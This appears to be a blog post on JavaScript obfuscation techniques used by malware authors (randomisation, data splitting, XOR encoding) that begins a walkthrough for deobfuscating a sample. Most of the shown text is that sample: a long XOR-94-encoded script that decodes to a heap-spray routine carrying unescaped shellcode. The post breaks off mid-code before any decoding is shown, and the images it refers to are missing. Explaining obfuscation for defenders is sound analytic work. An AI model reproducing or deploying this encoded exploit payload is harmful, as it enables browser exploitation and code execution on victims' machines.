Javascript Randomization Element and Data Obfuscation

Hi Friends,

Following up on my previous post about JavaScript evasion techniques, where malware authors use code obfuscation to bypass malware protection in the delivery phase, I would like to share another JavaScript obfuscation technique, randomization, and also how to deobfuscate it.

Elements Randomization

The malware author may randomly change the elements of the JavaScript code without changing the semantics of the code.

We can see in the above code that the variable names have been randomized. Besides the variable names, extra spaces and random comments are injected into the code to make static analysis harder for human eyes, while the semantics of the code stay unchanged. In the end the code has a different static pattern, so protection that relies on hash matching will fail to detect it.

Data Obfuscation

Data obfuscation converts a variable or a constant into the computational result of one or several variables or constants. Two data obfuscation techniques have been widely applied to string objects: string splitting and keyword substitution. String splitting converts a string into the concatenation of several substrings.

For example,

i = 20 can be rewritten as i = 5 * 4, i = 15 + 5 or i = 1000 / 50

Below is an example of string obfuscation.

Encoding Obfuscation

Normally, there are 3 ways to encode the original code. The first is to convert the code into escaped ASCII characters, Unicode or hexadecimal representations. The second method uses customized encoding functions, where attackers usually use an encoding function to create the obfuscated code and attach a decoding function that decodes it during execution.

The attached decoder recovers the exact values with a specific algorithm; in this case each value is XORed with 94.

Ok, I think it is better to have a walkthrough on decoding a malware sample. Let's decode the sample below:

var gZJkRLU = "";
var QjxT = function(SpPpOcOYkShRNZy) {
  gZJkRLU += String.fromCharCode(SpPpOcOYkShRNZy ^ 94)
};
QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(56) + QjxT(43) + QjxT(48) + QjxT(61) + QjxT(42) + QjxT(55) + QjxT(49) + QjxT(48) + QjxT(126) + QjxT(45) + QjxT(46) + QjxT(44) + QjxT(63) + QjxT(39) + QjxT(1) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(118) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(37) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(40) + QjxT(63) + QjxT(44) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(114) + QjxT(126) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(110) + QjxT(38) + QjxT(102) + QjxT(110) + QjxT(110) + QjxT(110) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(43) + QjxT(48) + QjxT(59) + QjxT(45) + QjxT(61) + QjxT(63) + QjxT(46) + QjxT(59) + QjxT(118) + QjxT(124) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(110) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(63) 
+ QjxT(107) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(103) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(111) + QjxT(109) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(106) + QjxT(102) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(110) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(63) + QjxT(59) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(107) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(59) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(56) + QjxT(56) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(56) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(106) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(58) + QjxT(61) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(103) + QjxT(109) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(107) + QjxT(58) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(103) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(106) + QjxT(102) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(103) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(103) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(106) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(107) + QjxT(59) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(111) + QjxT(102) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(63) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(105) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(60) + QjxT(103) + QjxT(123) + QjxT(43) + 
QjxT(111) + QjxT(108) + QjxT(104) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(58) + QjxT(58) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(106) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(59) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(61) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(63) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(104) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(109) + QjxT(104) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(110) + QjxT(103) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(56) + QjxT(104) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(111) + QjxT(59) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(104) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(59) + QjxT(111) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(61) + QjxT(103) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(105) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(104) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(61) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(107) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(58) + QjxT(58) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(63) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(102) + QjxT(106) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(102) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(110) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(56) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(103) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(107) + QjxT(58) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(63) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(102) + QjxT(107) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(103) + QjxT(60) + QjxT(123) 
+ QjxT(43) + QjxT(111) + QjxT(108) + QjxT(107) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(107) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(104) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(63) + QjxT(104) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(105) + QjxT(107) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(103) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(58) + QjxT(56) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(111) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(61) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(56) + QjxT(111) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(60) + QjxT(103) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(107) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(61) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(109) + QjxT(106) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(110) + QjxT(103) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(106) + QjxT(105) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(63) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(63) + QjxT(107) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(56) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(105) + QjxT(111) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(61) + QjxT(111) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(103) + QjxT(104) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(103) + QjxT(63) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(63) + QjxT(61) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(103) + QjxT(105) 
+ QjxT(107) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(107) + QjxT(111) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(103) + QjxT(56) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(107) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(58) + QjxT(107) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(107) + QjxT(103) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(60) + QjxT(105) + QjxT(56) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(59) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(63) + QjxT(58) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(111) + QjxT(103) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(63) + QjxT(63) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(107) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(63) + QjxT(61) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(61) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(59) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(108) + QjxT(104) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(106) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(103) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(58) + QjxT(61) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(103) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(111) + QjxT(61) + QjxT(109) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(61) + QjxT(107) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(102) + QjxT(104) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(56) + QjxT(61) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(109) + 
QjxT(106) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(108) + QjxT(61) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(105) + QjxT(105) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(107) + QjxT(103) + QjxT(63) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(111) + QjxT(107) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(60) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(61) + QjxT(58) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(103) + QjxT(59) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(104) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(56) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(58) + QjxT(56) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(61) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(63) + QjxT(59) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(59) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(110) + QjxT(61) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(59) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(106) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(110) + QjxT(58) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(61) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(58) + QjxT(56) + QjxT(63) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(59) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(59) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(105) + QjxT(56) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(111) + QjxT(58) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(63) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(61) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(110) + QjxT(59) + 
QjxT(111) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(58) + QjxT(59) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(102) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(56) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(104) + QjxT(58) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(58) + QjxT(56) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(110) + QjxT(58) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(60) + QjxT(56) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(59) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(61) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(107) + QjxT(59) + QjxT(60) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(104) + QjxT(56) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(103) + QjxT(103) + QjxT(56) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(60) + QjxT(61) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(58) + QjxT(58) + QjxT(107) + QjxT(123) + QjxT(43) + QjxT(59) + QjxT(59) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(107) + QjxT(56) + QjxT(105) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(102) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(61) + QjxT(58) + QjxT(56) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(56) + QjxT(56) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(56) + QjxT(107) + QjxT(56) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(58) + QjxT(102) + QjxT(56) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(102) + QjxT(103) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(106) + QjxT(105) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(63) + QjxT(105) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(56) + QjxT(108) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(111) + QjxT(105) + QjxT(110) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(105) + 
QjxT(108) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(103) + QjxT(104) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(105) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(107) + QjxT(104) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(59) + QjxT(105) + QjxT(108) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(107) + QjxT(104) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(59) + QjxT(105) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(56) + QjxT(104) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(56) + QjxT(104) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(105) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(108) + QjxT(56) + QjxT(104) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(61) + QjxT(108) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(111) + QjxT(104) + QjxT(56) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(109) + QjxT(104) + QjxT(106) + QjxT(123) + QjxT(43) + QjxT(105) + QjxT(110) + QjxT(108) + QjxT(59) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(56) + QjxT(104) + QjxT(61) + QjxT(123) + QjxT(43) + QjxT(104) + QjxT(104) + QjxT(104) + QjxT(111) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(58) + QjxT(104) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(106) + QjxT(106) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(104) + QjxT(109) + QjxT(104) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(111) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(107) + QjxT(109) + QjxT(102) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(107) + QjxT(109) + QjxT(103) + QjxT(123) + QjxT(43) + QjxT(109) + QjxT(104) + QjxT(109) + QjxT(109) + QjxT(123) + QjxT(43) + QjxT(102) + QjxT(110) + QjxT(102) + QjxT(110) + QjxT(124) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(99) + 
QjxT(126) + QjxT(43) + QjxT(48) + QjxT(59) + QjxT(45) + QjxT(61) + QjxT(63) + QjxT(46) + QjxT(59) + QjxT(118) + QjxT(124) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(58) + QjxT(110) + QjxT(58) + QjxT(123) + QjxT(43) + QjxT(110) + QjxT(58) + QjxT(110) + QjxT(58) + QjxT(124) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(41) + QjxT(54) + QjxT(55) + QjxT(50) + QjxT(59) + QjxT(126) + QjxT(118) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(112) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(57) + QjxT(42) + QjxT(54) + QjxT(126) + QjxT(98) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(117) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(1) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(1) + QjxT(45) + QjxT(55) + QjxT(36) + QjxT(59) + QjxT(126) + QjxT(115) + QjxT(126) + QjxT(118) + QjxT(46) + QjxT(63) + QjxT(39) + QjxT(50) + QjxT(49) + QjxT(63) + QjxT(58) + QjxT(112) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(57) + QjxT(42) + QjxT(54) + QjxT(126) + QjxT(117) + QjxT(126) + QjxT(108) + QjxT(110) + QjxT(119) + QjxT(101) + QjxT(126) + QjxT(126) + QjxT(126) 
+ QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(112) + QjxT(45) + QjxT(43) + QjxT(60) + QjxT(45) + QjxT(42) + QjxT(44) + QjxT(55) + QjxT(48) + QjxT(57) + QjxT(118) + QjxT(110) + QjxT(114) + QjxT(126) + QjxT(48) + QjxT(49) + QjxT(46) + QjxT(45) + QjxT(50) + QjxT(59) + QjxT(58) + QjxT(1) + QjxT(50) + QjxT(59) + QjxT(48) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(1) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + QjxT(45) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(48) + QjxT(59) + QjxT(41) + QjxT(126) + QjxT(31) + QjxT(44) + QjxT(44) + QjxT(63) + QjxT(39) + QjxT(118) + QjxT(119) + QjxT(101) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(56) + QjxT(49) + QjxT(44) + QjxT(126) + QjxT(118) + QjxT(40) + QjxT(63) + QjxT(44) + QjxT(126) + QjxT(55) + QjxT(126) + QjxT(99) + QjxT(126) + QjxT(110) + QjxT(126) + QjxT(101) + QjxT(126) + QjxT(55) + QjxT(126) + QjxT(98) + QjxT(126) + QjxT(111) + QjxT(108) + QjxT(110) + QjxT(110) + QjxT(126) + QjxT(101) + QjxT(126) + QjxT(55) + QjxT(117) + QjxT(117) + QjxT(119) + QjxT(84) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(126) + QjxT(54) + QjxT(59) + QjxT(63) + QjxT(46) + QjxT(1) + QjxT(61) + QjxT(54) + QjxT(43) + QjxT(48) + QjxT(53) + 
